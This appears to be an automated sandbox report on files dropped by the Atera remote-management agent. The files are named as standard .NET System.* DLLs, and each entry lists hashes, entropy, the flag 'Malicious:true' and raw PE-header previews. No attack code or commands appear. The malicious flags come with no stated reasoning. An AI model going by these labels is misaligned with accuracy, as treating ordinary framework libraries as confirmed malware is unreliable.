                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:czgHWexY+WKpW5FPYNyby2sE9jBF6IYiYF85S35IVnxGUHFjekhT0p:NH/JWKpWDQNyb8E9VF6IYijSJIVxXno
                                                                                                                                                                                                                                                                                                                                  MD5:9CF5E4927F9CCE043EE8605B943DF4A4
                                                                                                                                                                                                                                                                                                                                  SHA1:056398411D7FFC7D475178F0CB4FD816BEF9F059
                                                                                                                                                                                                                                                                                                                                  SHA-256:79F274739C20A80E9BD3DB2879E460F4AF336A3AB578D0E21B10E59F422FDD83
                                                                                                                                                                                                                                                                                                                                  SHA-512:0F24DA69BE27AE6F5A94B8069D329439EF454E830822F2DBBE9540587F456D4381852E503E39D1CDEC11634A0C3CEC65D17E9F865AD1B917F945A710562BD8A6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0............."*... ...@....... ...............................6....@..................................)..O....@..................((...`.......(............................................... ............... ..H............text...(.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P .......................(......................................BSJB............v4.0.30319......l...$...#~..........#Strings............#US.........#GUID....... ...#Blob......................3............................................................o.s...........D.....D.....D.....D...8.D...Q.D.....D.....D...l.....U.D.................m.....m.....m...).m...1.m...9.m...A.m...I.m...Q.m...Y.m...a.m...i.m...q.m.......................#.....+.....3.....;.)...C.D...K.d...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.X509Certificates.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16936
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.742652095009807
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:kTjbocNsWMhWqiNyb8E9VF6IYijSJIVxtLKy:IboYyFiEpYi60tB
                                                                                                                                                                                                                                                                                                                                  MD5:B1913ABA7CB4B8177597A01306077449
                                                                                                                                                                                                                                                                                                                                  SHA1:F8B5FBF3AE8BCD323E261708F8666D52E1967D26
                                                                                                                                                                                                                                                                                                                                  SHA-256:C652AE3A63C7361D9A66065BC5AF1486B5F4F9D49DDE88BD4D710064B596A668
                                                                                                                                                                                                                                                                                                                                  SHA-512:6D167B9CCE49EFCD6795085EF574505E663600ACDB5AA1E2A3EF2C42839140F5FB1A27CA5F22F0C9998A0FC51C70B52B4B84F2C9EEE06F6FD8F9AF98A889837B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.................. ...@....... ....................................@..................................-..O....@..................((...`.......,............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H.......P .......................,......................................BSJB............v4.0.30319......l.......#~......|...#Strings....x.......#US.|.......#GUID.......(...#Blob......................3................................'.....).........u.................=......."...:."...W.".....".....".....".....".....".....[.....".................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;./...C.J...K.j...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Principal.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.84199531949985
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:dSKiWIhWG3Nyb8E9VF6IYijSJIVxLp8Q+:dSK8l7EpYi609U
                                                                                                                                                                                                                                                                                                                                  MD5:BAF5AD32D34B62A97C8CBDEBC9C3F494
                                                                                                                                                                                                                                                                                                                                  SHA1:A9612646D46FBC9C7781A1276547789C1B93E914
                                                                                                                                                                                                                                                                                                                                  SHA-256:821CE0881EC98787B2D4EB96C6AEDE6F97A78D77317A6FE06D83116334C7C8C5
                                                                                                                                                                                                                                                                                                                                  SHA-512:5C27EA3AB317358ABD0C74661470EE805477A39EB7804505DD2BFC6419E50171CD51948701E5DC313A5A276278BD33582365B7F26DDC815A4E32302A8020543C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............(... ...@....... ..............................`.....@.................................t(..O....@.. ...............((...`......<'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P ..l....................&......................................BSJB............v4.0.30319......l.......#~......@...#Strings....D.......#US.H.......#GUID...X.......#Blob......................3......................................................\.....0.....'.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.6...K.V...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.SecureString.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16424
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.783015033813948
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:c0KbZWApWmWTpWSDNyb8E9VF6IYijSJIVxkp8Io8:zKRyhfEpYi603R8
                                                                                                                                                                                                                                                                                                                                  MD5:C37E91CF110F5CFE918FBE30CE619A7B
                                                                                                                                                                                                                                                                                                                                  SHA1:232428CC17FA86709D337CC9016EFD0FA2C3C0F8
                                                                                                                                                                                                                                                                                                                                  SHA-256:5CC275F2008667B255B88C9E521419E3F6B18FE05A08DE3FAF61BA645C99F064
                                                                                                                                                                                                                                                                                                                                  SHA-512:F3893766BB546DE7312A16B449904150076068F96D6230C5042337559FC29173B5B49A98ECC2C973C3829C6A3ADFB5DC7D9B0B20B2444ABB2AFADFA7F5C79E68
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............)... ...@....... ...............................4....@.................................>)..O....@..................((...`.......(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................r)......H.......p .......................(........................................(....*..(....*..(....*..(....*BSJB............v4.0.30319......l.......#~..........#Strings....`.......#US.h.......#GUID...x...(...#Blob...........G..........3.............................................."...........C...........u...............m.b...........J.....J.....J.....J...6.J...O.J.....J.....J...j.C...S.J.............................P ............X ............` ......4.....h ....................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.Extensions.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.873669060159367
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:4b1nWCXWr7Nyb8E9VF6IYijSJIVxnY3xzgAD:C7yXEpYi601AD
                                                                                                                                                                                                                                                                                                                                  MD5:0648BAB981B4F9076A22C327D13CD08A
                                                                                                                                                                                                                                                                                                                                  SHA1:70410CF50049EFB72F2638598173562DEBB72D86
                                                                                                                                                                                                                                                                                                                                  SHA-256:AEC930AD98614C414198235DEB05594E4A2119AE6576805D4DFA1B35C641BD21
                                                                                                                                                                                                                                                                                                                                  SHA-512:574D68ED279EDAAD8ED49463BC598D0AB38033AE5F83E46F2BBBAFD3758B800599DB28A537E633B37407BE5A90AFC6416354A4AEB592DD2916B65EF502025261
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ..............................p.....@..................................(..O....@..T...............((...`.......'............................................... ............... ..H............text... .... ...................... ..`.rsrc...T....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~.. ...t...#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0.....6.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.!...C.<...K.\...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.777459680511861
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:PLyW7TWyDNyb8E9VF6IYijSJIVxRr9hq5T:zfPfEpYi6049
                                                                                                                                                                                                                                                                                                                                  MD5:8BAAAFB084DA2C7DFE21AA0979A93722
                                                                                                                                                                                                                                                                                                                                  SHA1:690D59B3A630B4BF7950B5F10EBBFEDAB2628C94
                                                                                                                                                                                                                                                                                                                                  SHA-256:3CFDF251C5251E44B2E920BD7BE396A459B0368FA24E9DEA704A0C095DFFA87E
                                                                                                                                                                                                                                                                                                                                  SHA-512:5C4E497EB2CF957E378ADEB12C4091FEF50518305302D110007615C3F32C8524FFE9FC041D639F517C550AB651970472AE7E36E54FA3317F611FB05EDFF8508C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............2*... ...@....... ..............................i.....@..................................)..O....@..................((...`.......(............................................... ............... ..H............text...8.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P ......................((......................................BSJB............v4.0.30319......l...0...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0...........D.7.....7.....7...C.7.....7.....7...[.7...x.7...-.0.....7.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.RegularExpressions.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.907203433654942
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:46Rb32WVzWwtNyb8E9VF6IYijSJIVx0Edn:3Rb3dtJEpYi60tn
                                                                                                                                                                                                                                                                                                                                  MD5:8BD46AFC5FFAA5AC0912DC27ED8225E6
                                                                                                                                                                                                                                                                                                                                  SHA1:A4EA5C760639D531B3B003A49350EA1A991009C2
                                                                                                                                                                                                                                                                                                                                  SHA-256:30093DB698D34D8B943CAF84B1A92C879D9C9A69E535E659FCC6CFB55BC4CA83
                                                                                                                                                                                                                                                                                                                                  SHA-512:82B4407D2AE249561C15B94939380587540C6E16C565301C95698736763EE0E0392D7A04D3D4E60CE124965CCE1169AC566DE4E287FB71BA53FBF3BCE2D84D77
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ..............................!g....@.................................t)..O....@..P...............((...`......<(............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................)......H.......P ..l....................'......................................BSJB............v4.0.30319......l.......#~..........#Strings....@.......#US.D.......#GUID...T.......#Blob......................3..................................................K...d.K...8.8...k.....L.................K.................c...........5.........................2.....2.....2...).2...1.2...9.2...A.2...I.2...Q.2...Y.2...a.2...i.2...q.2.......................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Overlapped.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):31784
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.53558632581047
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:au5I+sqOylryry8qqIfUc7a5eMEpYi60L1:aYIVBpry8qqIfUcm5eF76c1
                                                                                                                                                                                                                                                                                                                                  MD5:90A21B291D110909D1314FCF0FC72BB1
                                                                                                                                                                                                                                                                                                                                  SHA1:6DD7ADBEEE485479408860200DC5F49F115B80CA
                                                                                                                                                                                                                                                                                                                                  SHA-256:8F9872B47A03F49038AEF2E2A4F436C95C98E03454FB8FD4165BE30DD8568A5F
                                                                                                                                                                                                                                                                                                                                  SHA-512:242B8EF499FDC57F84C28AB05CED704522427A4564C8A09B1FAF3BDC1CD31BB81DA9976ECE434DF255B5DF6B242B7ED7119274D075BD4E016F90D3926E90C221
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..F...........d... ........... ....................................@..................................c..O.......x............T..((...........c............................................... ............... ..H............text....D... ...F.................. ..`.rsrc...x............H..............@..@.reloc...............R..............@..B.................c......H........&...7...........^.......b......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2rK..p.(....*2ry..p.(....*2r...p.(....*2r...p.(....*2rc..p.(....*......(....*..0..;........|....(......./......(....o....s

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Tasks.Parallel.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.875436232333863
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:mvn4HREpWiQWtIANyb8E9VF6IYijSJIVxeWD4L/zP:5S/I4EpYi604zP
                                                                                                                                                                                                                                                                                                                                  MD5:2344CC0B9855F81BCB7E751D80D21179
                                                                                                                                                                                                                                                                                                                                  SHA1:7D2C1A5A2ABC687C28F9A5067DE662DF2AD14384
                                                                                                                                                                                                                                                                                                                                  SHA-256:9A93E0C9C327F1ABBC674E517C0A3FBB0140B5A27F7C80DDCBE9032176BC25F8
                                                                                                                                                                                                                                                                                                                                  SHA-512:0047A7F9E3DCA9B8171A148E0DF593A91EF39D9216895E3EE44F5B003C7528AD416C5A26AB672D3EB6CF0C141A9C35DD5FE9FF56C180F0D9D5A7B1D62D704DBF
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ...............................b....@..................................(..O....@..P...............((...`......x'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......l...#Strings....|.......#US.........#GUID...........#Blob......................3......................................................n.....B.....".....V.................U...........$.....m...........?.....(...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.!...C.<...K.\...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Tasks.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16424
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.772316361734143
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:x8MjKb47T3UCcqFMkJ59WdtWcnNyb8E9VF6IYijSJIVxoqdE:KMjKb4vcGdO7LEpYi604
                                                                                                                                                                                                                                                                                                                                  MD5:0F205F050B0909C80CB288C445BDAFA0
                                                                                                                                                                                                                                                                                                                                  SHA1:868DF211C1F68089C25BA8930B3BB700E47C90AC
                                                                                                                                                                                                                                                                                                                                  SHA-256:B51008C66734E5168C765CD209543A6185B0A533CCC5EDFBD8B3826F20B24B9F
                                                                                                                                                                                                                                                                                                                                  SHA-512:E0FD6907125B9BF4C11E7F502859AB248F4819A7F64146A7F80C791521967DE2508D4BFACACA36A1A6E0D195094DFCE802F43F95FA664CAEB0B830D40A2E9BB0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............,... ...@....... ..............................'.....@.................................`,..O....@..................((...`......(+............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................,......H.......P ..X....................*......................................BSJB............v4.0.30319......l...<...#~..........#Strings....4.......#US.8.......#GUID...H.......#Blob......................3................................!.....O.......................................].....z.............................7.......j...........n...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Thread.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.854792511202869
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:WzyNXd4+BW6FWqkNyb8E9VF6IYijSJIVxDYhno:PztEEpYi60cG
                                                                                                                                                                                                                                                                                                                                  MD5:5EB129E60284CD18523D2AE2F57CE500
                                                                                                                                                                                                                                                                                                                                  SHA1:4CAAA4456474C0500359F14F3E84319EA81223F5
                                                                                                                                                                                                                                                                                                                                  SHA-256:E16E323F21CA02969C85B8ACA1873ED9B717558B7DC2A5CE118501D71D2B9B03
                                                                                                                                                                                                                                                                                                                                  SHA-512:320CB5B86C5EA909FC58871C43D6F6B2970DA616A45296320FA6AA86F6A4D04B243A0CD1535FB1E3A3E0906FC15D3BD1239CDC69A3931A3960BD81962DAB953B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ..............................u.....@..................................(..O....@..................((...`.......'............................................... ............... ..H............text... .... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~..,...p...#Strings............#US.........#GUID...........#Blob......................3..................................................'.....'...T.....G.....h.................g...........6.................Q.....:...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.ThreadPool.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.861033315380582
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:rvs2Q3HKJNrWWRWfUANyb8E9VF6IYijSJIVxm80Cj:ruM0xEpYi60PBj
                                                                                                                                                                                                                                                                                                                                  MD5:6BD89B630BD9C780CF3C48612A7227B6
                                                                                                                                                                                                                                                                                                                                  SHA1:457AB05C6D797CD6F11D928EE26B983FA63C6F59
                                                                                                                                                                                                                                                                                                                                  SHA-256:8F9EEDE35E76E49140BADF31DA2463F74145E8024FF3239FB49D7F2A9013D018
                                                                                                                                                                                                                                                                                                                                  SHA-512:A63390CD243ED6401C3C0040CC29E1FE4645A2A614E61CCCB5039435518B37317E49EFBDF8E040C9233FE3AF0E3DACB86D6A50E3848DB2C074F61DDB72926506
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............(... ...@....... ....................................@..................................(..O....@..4...............((...`......h'............................................... ............... ..H............text........ ...................... ..`.rsrc...4....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......`...#Strings....p.......#US.t.......#GUID...........#Blob......................3................................................../...q./...E.....O.....Y.................X...........'.....p...........B.....+...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.8...K.X...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Timer.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.825651034994255
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:wFz0Q6gcqRhcsMWdMW+kNyb8E9VF6IYijSJIVx9JtEjK:wFz1c60EEpYi60LeK
                                                                                                                                                                                                                                                                                                                                  MD5:A4BC7A5AADAF47D2045637B67BF5378B
                                                                                                                                                                                                                                                                                                                                  SHA1:AAF12BCD3BAFB09D44D8E042DD03927B46E82117
                                                                                                                                                                                                                                                                                                                                  SHA-256:17F49645E2926FA0ED5DF41C2EBE7360A34CE8F13380CA3ADB3F8F65595E1C73
                                                                                                                                                                                                                                                                                                                                  SHA-512:4B8872A160A99142DCECF0A58F5E674D311DEE534662E6AFF02A7C49C48465D43969BFDB01FB21537E4B489E53E72D7F1EF5432F35BCC6233597107F3B3E8D88
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............(... ...@....... ....................................@.................................L(..O....@..................((...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ..D....................&......................................BSJB............v4.0.30319......l.......#~......,...#Strings.... .......#US.$.......#GUID...4.......#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16424
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.723492128711594
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:n6xWA3W4aW/NWQvNyb8E9VF6IYijSJIVxIJJpq:naB/TEpYi60N
                                                                                                                                                                                                                                                                                                                                  MD5:C64D37594DC6186E554E9BD43B596D83
                                                                                                                                                                                                                                                                                                                                  SHA1:CA7E94206F0817FFC4CBBD46858F5523C06A1981
                                                                                                                                                                                                                                                                                                                                  SHA-256:D52DED473FE832DCDCD12C2FCDB602F5DE12255E6D649CE72093065E02905BEA
                                                                                                                                                                                                                                                                                                                                  SHA-512:6712493B2C5179E14186718F87B963A2299CEA501D5B9AA47331A82E54A961727CEABEFFF00B3A5C7BC97A81F8DC22773966460C35BFF324EA61DEDACEF24A15
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............,... ...@....... ...............................]....@..................................+..O....@..................((...`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H.......P .......................*......................................BSJB............v4.0.30319......l... ...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................-.........O.k.....k.....X.....................1...........o.........................B...........9...........J.....J.....J...).J...1.J...9.J...A.J...I.J...Q.J...Y.J...a.J...i.J...q.J.......................#.....+.....3.....;.....C.-...K.M...S.

